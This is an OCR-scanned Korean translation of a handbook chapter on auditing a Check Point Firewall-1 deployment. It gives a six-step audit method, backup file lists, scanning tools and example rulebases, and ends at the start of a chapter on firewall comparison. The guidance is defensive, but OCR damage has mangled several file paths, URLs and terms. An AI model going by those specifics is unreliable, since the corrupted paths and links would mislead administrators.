• 사용기 록부에 서 의 사건선 택 과 통지 기 준들 

• 보수 및 행정적관리를 위한 접근까지 포함한 일체 접근경로들 

• 보안방책 및 대책들과 행정적절차(즉 사용자 및 봉사의 추가와 삭제，설비 및 
체 계 검 사기 륵부의 검열，체계와 매 체 의 보유 등) 

• 사용자구좌，파일체 계 허용사항，실행 파일속성，특권프로그람들, 망쏘프트웨 어 등 
망조작체계 전반에 대한 접근조종 

• 침입，봉사거부공격 등이 일어 날 경우에 대처한 기초시설에 대한 비상대응계획 
내 용 

• 게재된 보안경보게시판에 대한 접근과 사용 

방화벽점검을 진행할 때 여러가지 방법들을 리용할수 있다. 다음의 여섯가지 단계를 
중심으로 대 부분의 점 검 이 진행 된 다. 

• 기초시설과 그 구조를 분석 한다. 

• 기관의 방화벽 방책을 검 열한다. 

• 호스트들과 망분석스캔을 동작시켜 본다. 

• Firewall-1 의 설 정 상태 를 검 열한다. 

• Firewall-1 의 규칙기 지 들을 검 열한다. 

• 이 모든것 들을 보고서 에 반영한다. 

다음의 사항들로 매 단계를 확장해 나간다. 

1단계: 기초시설과 그 구조를 분석한다. 

방화벽 이 망보호를 제대 로 하는가를 알려면 망기초시설을 리해하는것 이 필요하다. 
점 검하여 야 할 항목들은 다음과 갈다. 

• 인 터 네 트접 근의 요구사항들 

• 인터네 트 혹은 인트라네 트 접 근의 업 무적 정 당성 에 대 한 료해 
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• 허용되여 들어 오는 봉사와 나가는 봉사 형태들에 대한 확인 

• 방화벽설계(즉 dual-homed, multi-homed, proxy) 의 검 토 

• 내외부망과의 련결상태분석 

• 울타리망과 외부와의 접속 

• 전자상업거래관문 

• 회사내 및 회사들사이의 LAN - WAN 련계 

• 전반적회사의 보안구조 

• 해당 장소에 있는 전체 콤퓨터시설물 

• 망관리자들과 방화벽관리자들과의 담화 

정보보안구조에 결함이 있어 회사의 방책 이 반영되지 못하였다면 방화벽 이 그 부족 
점을 절대로 메꾸어 줄수 없다. 

방화벽의 견지에서 볼 때 규모조절이 가능하고 분산화가 가능한 방화벽체계를 구성 
하기 위 하여 Checkpoint 회 사는 Firewall-1 제 품의 기 능을 두가지 구성 요소로 즉 방화벽 모둘 
과 관리모둘로 갈랐다. 이 두 구성요소들사이의 호상작용에 의하여 표준 Checkpoint 방화벽 
구조전체 가 구성 되 는것 이 다. 

관리모둘은 다른 모둘들에 대한 중앙적 인 조종을 하게 되며 방화벽의 기능들을 규제 
하는 규칙들과 대상들이 있는 곳이 다. 다른 방화벽 모둘들이 생성하는 모든 사용기 록부와 
경고문들이 이 관리모둘에 집중되여 보관되고 문의되고 점검되게 된다. 

방화벽 모둘자체 는 서 로 다른 구역간에 교환되 는 전송자료가 실지 통과하는 관문체 계 
이 다. 방화벽 모둘은 파케 트들을 검 사하고 규칙 들을 적 용하며 사용기 록부와 경 고문들을 
생성하는 체계 이 다. 방화벽모둘은 하나 혹은 그이상의 관리모둘에서 규칙기지들을 참조 
해 보며 사용기록부에 보관하지만 관리모둘이 가동하지 못할 때에는 자기자체의 현재 규 
칙기지 를 참조하며 독립 적 으로 기 능을 계속 수행할수도 있다. 

방화벽 구조설 계 에 리용할만한 가장 훌륭한 참고서 는 Elizabeth Zwicky 가 쓴 Building 
Internet Firewalls (O, Reilly & Assoc ISBN: 1565928*717) 이 다. 

2 단계: 기관의 정보체계의 보안방책들 검열한다. 

방책은 방화벽을 효과적이며 성과적으로 운영하는데서 사활적인 요소로 된다. 방화 
벽은 사용과 관리를 규제하는 실지사업적인 방책의 견지에서 구축되지 않는다면 효과를 
나타낼수 없게 된다. 

마크스 라늠은 방화벽이란 《인터네트보안방책의 실현이다. 만일 보안방책을 가지고 
있지 않으면 방화벽을 가지고 있지 않는것이나 같다. 반대로 그 무엇인가 있으면 그것은 
그 일을 하는것이라고 볼수는 있다. 그러나 다른 사람이 그 일을 이렇게 해야 한다고 말 
해 주지 않으면 실지 그것이 무슨 일을 해야 하는지 알수 없게 될것이다》라고 말하였다. 
이런 견지에서 어떤 기관이 정해 진 방화벽방책이 없는 상태에서 방화벽점검을 잘하려고 
생각한다면 그것은 그 기관의 미숙한 상태에서 그 무엇을 깨달으려고 하는것으로밖에 될 
수 없다. 
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방화벽을 점검할 때 방책에 기초하여 제기할 일부 질문사항들은 다음과 같다. 

• 기관에서 발표된 방화벽방책이 있는가. 

• 최고경영진이 방화벽기초시설과 관련한 방책들을 검열하고 승인해 왔는가. 

• 기 관의 정 보보안통제 는 누가 책임지고 있 는가. 

• 방화벽 방책을 변경 시 킬수 있 는 절 차들 이 있는가，있 다면 공정은 어떤 가. 

• 이러한 방책들이 기관내 전체 성원들에게 어떻게 통과되는가. 

방화벽의 관리에 대하여 제기할 문제점들은 다음과 같다. 

• 방화벽들은 누가 소유하고 있으며 그것이 규정되여 있는가. 

• 매개 방화벽에 해당한 방책실행은 누가 책임지고 있는가. 

• 방화벽 에 대 한 일상적 인 관리는 누가 책 임지 고 있는가. 

• 방화벽 사용과 관련한 방책 준수정 형 은 누가 감시 하고 있는가. 

• 보안관련사건은 해당 정보보안관계자들에게 어떻게 보고되고 있는가. 

• 새 로운 취 약점 들의 존재 에 대 해 CERT 나 CIAC 등 판매 입 체 등 판매 업 체 마다 고 
유한 자문을 감시 하는가. 

• 내 적해결 및 보고 등 각종 사건에 어 떻게 대 응해 야 하겠는가에 대 한 서면으로 
된 절차는 있는가. 

변경통제는 방화벽에서 사활적인 문제이다. 일부 변경통제와 관련한 문제점들은 다 
음과 갈다. 

• 변경 통제절 차에 대 한 문건 이 있 어 야 한다. 

• 시험계획들이 총화되여야 한다. 

• 갱 신설 정절 차를 점 검한다. 

• 경 영 진의 승인과정 을 점 검한다. 

• 다음의 구성 요소들에 대 한 변경 내 용이 문건화되 였는가를 점 검한다. 

• 판본갱 신 이 나 부분보충/수정 시 가동정 지 시 간을 통지 하고 계 획 화해 야 한다. 

• 모든 변경내용에 대한 전자적인 복사판들 

• 모든 변경내용에 대한 종이문건기록 

마지막으로 재 난발생시 예비본 ( backup ) 과 비상대책계획이 필수적 이 라는것을 고려해 
야 한다. 일부 문제점들은 다음과 같다. 

• Firewall -1 프로그람의 《황금본》을 보관해 둔다 황금본 (golden copy ) 이 란 호스트 
가 망과 련결되 기 전에 만들어 놓은 총적 인 예 비본을 말한다. 이 예 비본을 복구 
할 때 리용할수도 있고 방화벽 이 일정하게 의 심을 불러 일으키는 경우 참조해 
볼수도 있다. 
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• 예 비본작성절차와 해 당 문건들을 점검 한다 예 비본작성절차에는 복원절차가 포함 
되여야 한다. 즉 예비본을 작성한후에 복원해 보아서 그 전일성이 확인되여야 
예비본이 완전한것으로 될수 있다. 또한 예비본들이 안전한 곳에 보관되여야 한 
다(주의: 강조할것은 많은 경우 금고가 예비본매체를 물리적으로 보존할수는 있 
지만 화재때에는 열에 의한 파괴를 어쩔수 없다는것이다. 테프，플로피，하드디 
스크 갈은 자료매체를 보존하기 위하여 금고를 특수하게 설계해야 한다.). 방화 
벽을 다시 구축하거 나 교체해 야 할 경우에는 여 러 파일들을 복원하여 야 한다(표 
10-1). 이 파일들은 테프 구동기나 기타 큰 보관도구와 같은 외부적인 구동기를 
리용하여 체계완전예비본을 통하여 작성될수 있다. 방화벽기능을 실현하는데 가 
장 사활적 인 파일들은 플로피 디스크 한장에 들어 가게끔 해 야 한다. 

표 10-1 예비본을 따두어야 할 Firewall -1 의 기본설정파일들 

관리모듈에서 

$FWDIR 八 ; onf/fw.license 
$FWDIR/conf/objects.C 
$FWDIR/conf/*.W 
$FWDIR/conf/rulebases .fws 
$FWDIR/conf/fwauth.NDB* 

$FWDIR/conf/fwmusers 
$FWDIR 八 ; onf/gui-clients 
$FWDIR/conf/product.conf 
$FWDIR/conf/fwauth.keys 
$FWDIR 八 x>nf/serverkeys. * 

방화벽모듈에서 

$FWDIR 八 ; onf/fw.license 

$FWDIR/conf/product.conf 

$FWDIR/conf/masters 

SPWDIR/conf/fwauth.keys 

$FWDIR 八 : onf/product.conf 

$FWDIR 八 x>nf/smtp.conf 

$FWDIR/conf/fwauthd.conf 

$FWDIR/conf/smtp.conf 

$FWDIR/conf/fwauthd.conf 

$FWDIR/conf/fwopsec.conf 

$FWDIR 八 : onf/product.conf 

$FW 미 R / conf / serverkeys .* 


www.phoneboy.com/fwl/faq 八 ) 196.html 을 보라 . 
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• 예비본작성시간표를 점검한다. 

• 절차가 준비되여 있어서 봉사가 파탄될 때 방화벽체계를 보장할수 있는가를 결 
정 한다. 

• 비상대 책 안을점검 한다. 

• 비상대책안，문건을 작성한다. 


Information Security Policies and Precedures (Thomas Peltier, Auerbach Publications)-^- 
정 보보안방책 을 처 음으로 개 시하는데 서 큰 도움이 될 수 있는 참고서 이다. 포괄적 인 보안 
방책 이 없으면 이 도서는 만병통치 약으로 될수 없다. 그러 나 이 도서는 수많은 계획들과 
대 책안들이 수렁창에 빠지 지 않고도 보안방책 을 신속히 전개해 나가는데 도움을 준다. 

이 러한 분석과 조사는 반드시 기관의 기 업적목적의 테두리안에서 진행되여 야 한다는 
것은 명 백하다. 정 보체 계보안이 위 험 관리 에 관한 문제 이지 만 회 사의 기 업전략의 틀거 리 
안에서 관철되지 않으면 그 보안은 실패하기 마련이 다. 

3단계: 호스트쏘프트웨어평가스캔들 진행한다. 

방화벽설정이 잘되여 있지 않으면 비법적인 대상이나 외부사람들이 방화벽이 있음에 
도 불구하고 망으로 침입해 들어 올 가능성이 있다. 개별적인 방화벽 호스트에 대한 쏘프 
트웨 어 스캔을 수행 함으로써 구체적 인 취 약점들을 발견해 낼수 있다. 이 스캔도 구들은 보 
안상 허점들을 발견하고 체계상 약점들을 구체적으로 알려 주며 방책들을 확인하고 회사 
의 보안전략들을 실시하게 한다. 이러한 도구들은 체계상 약점들을 검사하는데서 필수적 
이다. 스캔도 구들이 발견할수 있는 일부 사항들은 다음과 갈다. 

• 조작체계의 부정확한 설정 

• 보안설정 및 통과암호설정에서의 부정확성 

• 완충기 범 람 

• SANS 의 10 대 인 터네 트보안위 협 요소의 탐지 

• FreeBSD 에 영향을 주는 토막화오유 

• 통과암호가 없는 NT 고객구좌와 관리자구좌 

일부 인기 있는 스캔도구들은 다음과 갈다. 


• NAI Cybercop (http:/ 八 vww.pgp.com/products 八: ybercop-scanner) 

• ISS Internet Scanner (http://www.iss.net/intemet_scanner/index.php) 

• SAINT (http://www.wwdsi.com/saint) 

• Symantec (이전에는 Axent) NetRecon (http://enterprisesecurity.symantec.com/products) 

• Netcat (http://www. 10pht.com/weld/netcat/) 

• nmap (http://www.insecure.org/nmap/index.html) 
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강조해 야 할것 은 방화벽 에 대 한 호스트쏘프트웨 어 평 가스캔 을 실 행 하는것 이 방화벽 점 
검의 한 측면에 지 나지 않는다는것 이 다. Cybercop 같은 도구들은 실행시키기 극히 쉽 다. 
그러 므로 그 도구들을 실행시 키기 위하여 어 떤 전문봉사회 사를 데 려 올 필요가 전혀 없다. 
전문보안봉사회 사를 데 려 올 분야는 전반적 인 구성 의 설계，분석，오유수정분야이 다. 어 떤 
회사가 와서 이 도구들을 실행시키고 결과를 고객에게 넘겨만 준다면 이것은 자기 할바 
를 제대로 하지 않는것으로 된다. 

이것은 결국 보안기초시설은 초기 에 구성해 놓아야 한다는 점 을 다시 강조하는것 으 
로 된다. 이 구성 에서는 보안，능력，예 비，관리와 갈은 항목들을 잘 고려하여 야 한다. 구 
성을 잘하지 못하면 체계의 재설계를 계속 반복하지 않으면 안될것이다. 

4단계: Firewall -1 의 설정들 점검한다. 

Firewall -1 이 충분한 보호 및 안전기능을 제공하지만 설정이 잘되여 있지 않는 경우 
보안은 침식 되 고 만다. 보다 심 각히 검 토해 보아야 할 항목들은(순서없이) 다음과 같다. 

IP 보내기 IP 보내 기는 Control IP Forwarding 으로 설정해 놓아야 한다. IP 보내 기는 조 
작체 계핵 심부에서 기능정지시켜 야 한다. 이 렇게 하면 Firewall -1 이 가동하지 않는 한 IP 보 
내기는 절대로 기능활성화되지 않는다. 
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그림 10-1. 방화벽관리 자들과 그 허 용사항 
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조작체계판본조종 Checkpoint 쏘프트웨 어와 망조작체계를 위 해서 는 방화벽 이 현재의 
지 원되는 Firewall-1 판본을 실행시키게 하여 야 한다. 특별히 최 신판을 적재 하지 않는다 하 
더 라도 부분적재 나 보강은 하도록 해 야 한다. 

물리적보안 방화벽은 물리적으로 안전해야 한다. 강조해야 할것은 모든 망조작체계들 
이 자기 의 보안모형 을 안전한 물리 적기 초시 설 에 근거하여 구축하여 야 한다는것 이 다. 방 
화벽은 승인된 인원들에게만 접근이 한정된 구역에 배치되여야 한다. 

특히 

• 현지 조종반이 안전해 야 한다. 

• 관리조종반은 외 부망에 공개 되 지 말아야 한다. 

• 방화벽설정상태가 완전히 보호되여 손대지 못하게 되여야 한다(승인된 관리국을 
제 외 하고). 

• 현지의 관리를 맡은 관리자에 대하여 완전한 인증을 요구하게 해야 한다. 

• 원격관리를 위해서도 완전인증과 암호화된 접속을 요구하게 해야 한다. 

불필요한 체계구성요소들은 제거한다 콤파일러，디바거，보안도구를 비롯한 쏘프트웨 
어는 방화벽에서 제거해 버려야 한다. 

충분한 예비전원공급 방화벽 을 위한 UPS (무정전전원장치)가 없으면 정전되는 경우 보 
안이 충분히 실시될수 없다. 

작업기록부검열 방화벽 과 망조작체 계 의 작업기 록부를 검 열 하고 분석해 볼 필 요가 있 
다. 모든 실 행 과정 들을 작업기 록부에 서 찾아 보며 그것 은 디 바김 과 법 정 분석 에 리용할수 
있 다. 

리 상적 으로 볼 때 작업기 록부는 먼곳에 있는 작업기 록부용호스트나 독립 적 인 디 스크 
구역 에 써 넣 는것 이 좋다. 공격 이 있는 경 우에 는 작업기 록부에 서 결정 적 인 문서내 용을 찾 
아 사고의 여 러 측면 을 추적할수 있 을것 이 다. 또한 이 정 보를 리용하여 구멍 이 난 곳들 
을 발견할수 있고 공격의 범위를 밝히며 또 공격에 대한 문서화된 증거를 제시하며 지어 
공격의 개시점 도 추적해 낼수 있게 된다. 공격 자가 흔히 처 음으로 하는 일은 작업기록파 
일들을 변경시키거 나 파괴 함으로써 자기의 흔적을 은폐하는것 이 다. 이 기 록파일 이 파괴 
되 는 경 우에 는 예 비본파일 을 리용하여 사건을 추적해 야 한다. 따라서 정 상적 으로 예 비 본 
을 해두는것 은 필 수적 이 다. 

시간동기화 시간동기화의 목적은 두가지 이다. 즉 시간엄수를 요하는 사건이 정확한 
시간에 실행되도록 하며 서로 다른 작업기록파일들이 서로 련결되게 하는것이다. 부정확 
한 시 간이 반영 된 작업기 록파일들은 가능하면 법 적 증거 물로 제 시하지 않을수 있 으며 이 
것 을 리용하여 공격 자를 기 소하려 는 시 도를 막을수 있 다. 

망시 간규약 (NTP)RFC 1305는 호스트동기 화에 흔히 쓰인 다. 후에 검 열 할수 있는 보다 
높은 급의 동기화방법을 요하는 환경에서는 Certified Time (www.certifiedtime.com) 에서 보 
내오는 시간동기제공자료들을 조사해 보는것이 좋다. 

무결성검사 무결성검사는 파일체계에서 무엇이 변경되여 어느 파일에 결정적인 변화 
가 있을 때 그것 을 체 계관리 자에 게 통지해 주는 방법 으로 되 고 있다. 가장 널 리 알려 지 
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고 리 용되 는 무결성 검 사응용프로그람은 Tripwire ( www . tripwire . com ) 이 다. 

봉사와 규약의 수를 제한한다 방화벽에는 절실히 필요 없는 프로그람이 설치되거나 
실행되는 일이 없어야 한다. 불필요한 규약이 있으면 불필요하게 통신련결점을 열어 놓 
게 된 다. 포구스캔 을 하여 어 떤 봉사형 태 가 현재 열린 상태 인 가를 알아 낼 수 있 다. 봉사 
종류가 너무 많으면 방화벽의 효과성이 지장 받는다. 매 봉사형태를 승인 받아야 하며 
승인 받지 못하는 경우에는 기능정지시켜야 한다. 

위험한 구성요소나 봉사형 태들은 다음과 같다. 

• X 혹은 GUI 관련프로그람 

• NIS ， NFS , RPC 관련쏘프트웨 어 

• 를파일 러， Perl , TCL 

• Web 봉사기 쏘프트웨어，행 정 관리쏘프트웨 어 

• 탁상형 콤퓨터 용응용프로그람들(즉 Microsoft office , LotusNotes ， 열 람기 등) 

NT 용방화벽 에서 는 다음의 봉사형 태 들과 규약만 리용할수 있게 설정해 야 한다. 

• TCP/IP 

• Firewall -1 

• Protected Storage (보호보관) 

• UPS (무정전전원체계 ) 

• RPC (원격전화호출) 

• Scgeduler 

• Event log (사진 기록부) 

• Plug - and-Play 

• NTLM 정 보지원제공자 

다른 기능들이 필요하면 요구에 따라 추가하면 된다. 

조작체계를 강화시킨다 기본망조작체계에 어떤 약점이나 오설정이 있으면 firewall -1 
이 침식될수 있다. 방화벽은 요새처럼 보호되여 보안의 성새로 되여야 한다. 방화벽이 결 
코 일반용콤퓨터로 취급되여서는 안된다. 

조작체계를 강화시키는 방법에 대해서는 다음의 우수한 문건들을 보면 된다. 

• Amoring Solaris ( www . enteract . com /~ lspitz / armoring . html ) 

• Amoring Linux ( www . enteract . com /~ lspitz / linux . html ) 

• Amoring NT ( www . enteract . com /-1 spitz / nt . html ) 


미 리 강화된 장치를 필요로 하는 사람들은 Nokia 방화벽을 사용할수 있다 ( www . nokia / 
securerity sloutions / network / firewallhtml ). Nokia 사의 방화벽은 Firewall-l 을 내장한 하드웨어 
식 이 다. 방화벽의 기능을 높이 기 위하여 강화되 고 최 량화된 IPSO 조작체계상에서 실행된다. 
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Firewall -1 의 특성 그림 10-3 은 Security Policy (보안방책)표쪽을 보여 준다. 필요 없 
는 항목들은 표식하지 말아야 한다. 



그림 10-3. 보안방책표쪽 


• ICMP 4.0 판에 서 는 ICMP 용 Checkpoint 의 정 상상태 점 검 (Stateful Inspection ) 을 리 용 
하기 위 하여 기 능활성 ( enable ) 상태 는 놓아 둘 필요가 있을수 있으나 일 반적 으로 
는 이 특성을 기능정지 ( disable ) 해두는것이 좋다. 

• Zone transfer 대부분의 싸이트에서는 DNS 내 리적재 를 실행할수 없다. RIP 와 
DNS 참조항목에 서 도 마찬가지 이 다. 

Firewall -1 의 망객체 Firewall -1 에 대한 점검의 핵심적측면은 규정된 망객체전체를 분 
석 하는것 이 다. Firewall -1 의 망객 체 들이 란 보안방책 의 부분으로서 서 로 묶어 진 론리 적 인 
실체들을 말한다. 실례로 한 무리의 Web 봉사기들은 간단한 하나의 망객체로서 거기에도 
하나의 규칙 이 적 용된 다. 모든 망객 체 는망주소와 부분망디 스크를 비 롯한 한조의 속성 을 
가진다. 망객체의 부분으로 될수 있는 실체들은 대표적으로 다음과 갈다. 
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• 망과 부분망 

• 봉사기 

• 경로기 

• 교환기 

• 호스트들과 관문 

• 인터네트령역 

• 우의것들의 모임 

Firewall -1 은 송신지 와 수신지 사이 의 망객 체 들을 형 성 할수 있게 한다. 이 망객 체 들은 
단 한개의 기구로부터 수천개의 기구들을 포함하는 망전체까지 포함하여 참조할수 있다. 
Firewall -1 방화벽의 보안설정형태와 보안수준을 평가하려고 할 때 이 망전체는 상당한 난 
관을 조성 하게 된다. 심각한 문제점은 망객체 가 수많은 객체 들을 포괄할 때 자기의 기 본 
안전상태를 어떻게 결정하는가 하는것이다. 

Firewall -1 에서 기구들에 대하여 이렇게 객체지향적인 수법으로 관리 하게 되면 방화 
벽관리 자는 경 로기 나 기 타 다른 기 구들을 망객 체 로 규정할수 있게 되 며 방화벽보안방책 
의 규정내 에서 이 객체들을 사용할수 있게 된다. 망객체들은 많은 수의 망기 구들을 참조 
하는데서 능률성을 보장하기 위하여 주로 사용된다. 이 렇게 되면 호스트이름， IP 주소，위 
치 등과 같은것들을 기억할 필요가 없게 된다. 이러한 객체들을 리용하면 망객체들의 사 
용상 편리와 시간절약이 상당한 수준으로 높아 지지만 각 기관에서는 그 객체에 소속되 
여 있는 모든 기구나 장치들이 정말로 신뢰성이 있는가에 대하여 검토해 볼 필요가 있 
다. 그림 10 — 4에는 일부 현존객체들을 담은 Network objects 창문이 있다. 그림 10 — 5는 
망객체에 소속된 수많은 워크스테 이션들을 보여 주고 있다. 
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그림 10-4. 현존 객체들 
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그림 10-5. 많은 워크스테 이션들을 하나로 묶은 망객체 

우에서 언급되였지만 망객체를 이렇게 사용하는것은 관리자의 견지에서 볼 때에는 
시간이 절약되는것으로 되나 보안상 견지에서는 문제성이 있다. 그것은 망객체에 포함되 
는 모든 실체에 대하여 자동적으로 《내장형신뢰》가 구성되기때문이다. 이것은 대형망 
들에서는 망객체에서 정의된 매 개별적인 실체들을 하나하나 조사하는것이 시간이 많이 
든다는 사정과 관련된다. 이러한 설정에 의한 애로가 있으므로 방화벽규칙이 제공하는 
보호상태를 정 확히，정밀하게 검 사하기 위 해서는 망객체안에 있는 모든 장치 들을 남김없 
이 검사하는것이 필수적이다. 

5단계: Firewall -1 의 규칙기지를 점검한다 

규칙기지를 점검하는 목적은 이 방화벽이 어떤 봉사형태와 자료들을 허용하는가를 
알자는것이다. 규칙기지를 분석하는 목적은 또한 불필요하거나 반복되거나 승인되지 않 
은 규칙들을 밝혀 내는데도 있다. 규칙들의 수를 줄이는 한가지 방도는 규칙들을 합치는 
것이다. 일부 경우 반복적 인 규칙들은 통합시킬수 있기때문이다. 

규칙기지점검의 사명은 방화벽이 규정된대로 자기의 기능을 수행하도록 하는것이다. 란 
스 스피 츠너 는《 Building Your Firewall Rule Base 》에서 《 공고한 규칙 기 지 구축은 방화벽 을 성 
과적으로 안전하게 운영하는데서 사활적 인 단계 이 다. 어떤 가동환경과 응용프로그람들이 가장 
훌륭한 방화벽 으로 되 는가에 대 해서는 보안관리 자들과 보안전문가들속에 서 론의 가 분분하다. 
그러 나 이 모든것 은 방화벽 규칙 기 지 가 오설정 되 면 다 무의 미 해 진다. > 라고 쓰고 있 다. 

규칙기지는 Checkpoint 방화벽의 생명이다. 규칙기지는 방화벽에 보관된 하나의 파일 
토서 순서화된 한조의 규칙을 가지고 있으므로 매 방화벽에 해당한 보안방책을 규제해 
준다. 규칙기지 에 대 한 접근은 방화벽 을 직 접 관리하는 사람들에게 혹은 설정할 때 규제 
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된 GUI 의뢰기명단에 있는 한 성원에게만 제한되여 있다. 

하나의 규칙은 원천지와 목적지，봉사형 태의 측면에서의 통신을 해석한다. 규칙은 또 
한 통신을 허 용하겠는가 허 용하지 않겠는가 그리 고 사용 및 작업기 록부에 기 록할것 인가 
하지 않을것 인 가를 규정 해 준다. 

Firewall -1 의 검 사엔 진은 《 최 적 합》 ( best - fit ) 에 대 치 되 는 개 념 인 《 초적 합 ( first - fit ) > 
도구이다. 즉 20개의 규칙을 가진 규칙기지가 있는데 들어 오는 파케트가 규칙 4번에 일 
치한다고 하면 검사엔진은 즉시에 멈춰 서서(규칙을 매 파케트별로 순서 있게 찾아 보게 
되 므로) 규칙 기 지 의 나머 지 부분은 커 지 지 않는다는것 이 다. 

규칙기지점검 에 대 하여 보안전문가인 란스 스피츠너는 그 목적은 규칙 이 30개를 넘 
지 않게 하는것 이 라고 권고하였 다. 30가지 이 상의 규칙 이 있으면 복잡성 은 기 하급수적으 
로 늘어 나 오유가 생기게 된다. 

매 규칙기지 는 독립 적 인 하나의 이 름을 가진다. 공통적 인 명 명관례 에 따라 표준화하 
는것 이 유용하다. 좋기 는 《 방화벽 이 름-관리 자이 름의 첫 글자-변경 날자》식 으로 하는것 
이 좋다(례: ful - am -( ni 201). 

이러한 명명관례를 따르면 방화벽관리자가 그 규칙기지가 어느 방화벽에 소속되여 있 
는가，그 규칙기지가 마지막으로 언제 변경되였는가，누가 현 설정으로 마지막변경을 하였 
는가를 정 확히 알수 있 게 한다. 규칙 기 지 점 검 을 위 해 서 는 개 개 의 규칙 을 검 열 해 야 한다. 

여섯가지 규칙을 가진 간단한 규칙까지의 례(그림 10 — 6에서 보여 줌)를 다음과 같 
이 볼수 있다. 

• 규칙 I 과 2는 GUI 에서 승인되여 있는 관리자들이외에는 누구도 방화벽에 직접 
접근할수 없다는 비밀화규칙이라는 개념을 시행한다. 규칙 1은 해당 관리자그룹 
성원이 아닌 사람이 보내는 파케트이면 어떤 파케트이건 Firewall -1 이 버리게 한 
다. Firewall -1 의 봉사는 미 리 지적되 여 있고 또 모든 Firewall -1 관리 포구들을 규 
제 하고 있다. 비밀화규칙은 패키지를 거절 ( reject ) 하지 않고 버 리는 ( drop ) 것 이 다. 
패키지를 거절하면 보내는 사람이 먼 이쪽에 무엇인가 있다고 생각하게 되며 버 
린다면 먼 이쪽에 호스트가 있다는것을 잘 모를것이다. 또한 이 규칙은 사용기 
륵이 되므로 이 방화벽 에 누가 직접접 근하려 고 시도하는가에 대 한 구체적 인 정 
보가 수집될수 있다. 

• 규칙 3은 임의의 호스트전자우편이 내부우편봉사기에 련결되는것을 허용한다. 

• 규칙 4는 임의의 호스트 HTTP 와 HTTPS 가 내부 Web 봉사기들에 련결되는것을 허 
용한다. 

• 규칙 5는 내 부호스트가 4가지 규정 된 규약을 위하여 인 터네 트에 접 속하는것 을 
허용한다. 

• 규칙 6은 청소규칙이다. 이 시점에서 방화벽이 처리하지 않은 파케트가 있으면 버 
리고 기록해 둔다. 사실 이 시점에서 방화벽이 처리하지 않은 파케트들은 아무렇 
게 나 버 려 도 되 는것 이 다. 이 청 소과정 의 우점 은 이 파케 트들을 기 륵부에 기 록한다 
는데 있다. 이렇게 되면 어느 파케트들을 방화벽이 처리하지 않았는가를 알수 있게 
된다. 이것은 규모조절성이 보다 높은 방화벽구조를 설계하는데 도움이 될수 있다. 
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우에서 본 규칙기지의 례는 여섯가지 규칙만이므로 좀 간단하다. 기업들에서 가지고 
있는 대부분의 규칙기지들名 보다 구체적이며 복잡하다. 50 개의 규칙과 수천개의 망객체 
들을 가진 하나의 규칙기지 를 다 통과하는데는 한참 시 간이 걸릴것 이 다. 

그림 10—7 에 는 내 용이 좀 더 있는 규칙기 지 하나를 보여 준다. 

• 규칙 1은 비 밀 화규칙 을 시 행한다. 

• 규칙 2〜4는 우편봉사기와 의뢰기사이의 우편전송을 허 용한다. 

• 규칙 5는 임의의 호스트 HTTP 가 내부 Web 봉사기에 련결되는것을 허용한다. 

• 규칙 6은 DMZ (비무장지대)와 인트라네트사이의 자료전송을 차단한다. 

• 규칙 7〜8은 DMZ 와 인트라네트사이에서 오가는 자료들을 다 차단한다. 

•규칙 9는 과도량의 자료흐름을 초래하는 규약은 버리는데 이 경우에는 

nbdatagram, nbname 파 nbsession 이 그런 자료들이 다. 

• 규칙 10은 청 소규칙 이 다. 

점검과정에 그 어떤 규칙이 실지 필요 없다고 생각되면 그 규칙을 기능정지시킬수 
있다. 일반적으로 어떤 규칙이 기능정지 당하였지만 의견이 제기되지 않으면 그 규칙은 
삭제해 버 릴수 있 다. 그림 m — 8은 기 능정 지 된 규칙의 례 를 보여 준다. 

암시적허우|규칙 허 위규칙 들은 정 상규칙 기 지 상에 는 나타나지 않으나 Security Policy 의 
Properties Setup 판의 설정에 기초하여 Firewall-1 이 자료적으로 창조하는 규칙들을 말한다. 
이 규칙 들은 Security Policy 대 면부에서는 규칙기지와 함께 볼수 있다. 그림 10-9 에는 암 
시 적허위규칙의 례 를 규칙하나를 가진 규칙기지 와 함께 보여 주고 있다. 

그 단 하나의 규칙 이 암암리 에 모든 자료송신을 다 버리지만 그래도 방화벽을 통과 
할수 있는 통과량(자료)은 많다. 이 암시 적허위규칙들에서 보는바와 같이 대부분 련결성 
이 있음으로 하여 방화벽의 내부운영이 진행되는것이다. 

6단계: 모든 자료를 보고서에 반영한다. 

사업이 전부 끝난후 방화벽점검내용을 문건화해야 한다. 점검후 보고서를 작성하는 
것은 나타난 결함들을 수정 할 때 의거 할수 있는 문건적기초를 마련하는것 이 다. 

앞에서도 언급되였지만 스캔도구들이 쓰기 편리하므로 큰 보고서를 하나 작성하는것 
은 간단하다. 그러나 방화벽점검보고서가 의뢰자에게 가치 있는것으로 되기 위해서는 다 
음의것들을 포괄하여 야 한다. 

• 현 보안상태를 서술한다. 현 망환경과 현 보안태세의 기본상태를 구체화한다. 기 
관의 전반적보안목적과 일 치시키 기 위하여 이것을 기 업위 험분석 에 참조적 으로 
붙 인다. 

• 모든 보안상의 허점들을 밝힌다. 

• 수정안，대책안，시행의 우선권 등을 권고한다. 구체적인 시행안을 제기하여 모 
든 대 책 안들과 수정 안들의 예상효과를 제시 한다. 
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• 원가，사용상 편의，업무요구사항를 그리고 허용수준의 위험요소들과 관련한 보 
안대 책 안에 대 한 구체적 인 분석을 한다. 

• 앞으로의 참고와 비교를 위한 기초자료를 제공하여 체계가 안전하게 가동하기 
시작하도록 한다. 


결 론 


방화벽의 효과는 그것을 얼마나 정확히 시행시키는가 하는데 달려 있다. 게다가 오 
늘의 기업환경에서는 방화벽의 설정이 잘못되기 쉽다. 방화벽설치를 점검함으로써 방화 
벽관리자들은 방화벽이 제대로，예견한대로 통제수단으로서의 작용을 하도록 하여야 한 
다. 이렇게 하면 기분도 좋아 지고 보안상태도 좋아 질것이다. 
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제 1 1 장. 방화벽기술비교 


퍼 토쉐임 


20()1 년 1월 초에 새로운 Web 폐지 가 개설되였다. 이름은 Netscan 으로 달았다. 이 페 
지의 창설자들은 자기들의 Web 페지를 개설하느라고 많은 수고를 하지 않으면 안되였다. 
사실 그 일은 간단하면서도 시 간이 많이 드는 일이 였다는것 이 다. 그들은 경 로조정된 전 
체 IPv 4 주소공간을 ping 지 령 으로 접속확인하였다. 즉 더 정 확히 말하여 .0 혹은 .255 로 끝 
나는 모든 IP 주소들을 다 조사해 보았다. 매개 ping 지 령에 대 하여 하나의 ping 중계를 기 
대하였다. 하나이상의 파케트로 대답하는 매개 망에 대하여 그들은 응답수를 계산하고 
그 결과를 자료기지에 기록하였다. 보낸 매개 파케트에 대하여 하나이상의 파케트로 대 
답하는 모든 망들은 증폭기 망으로 된다고 보았다. 그들은 전체 인 터네 트(많건 적 건)를 
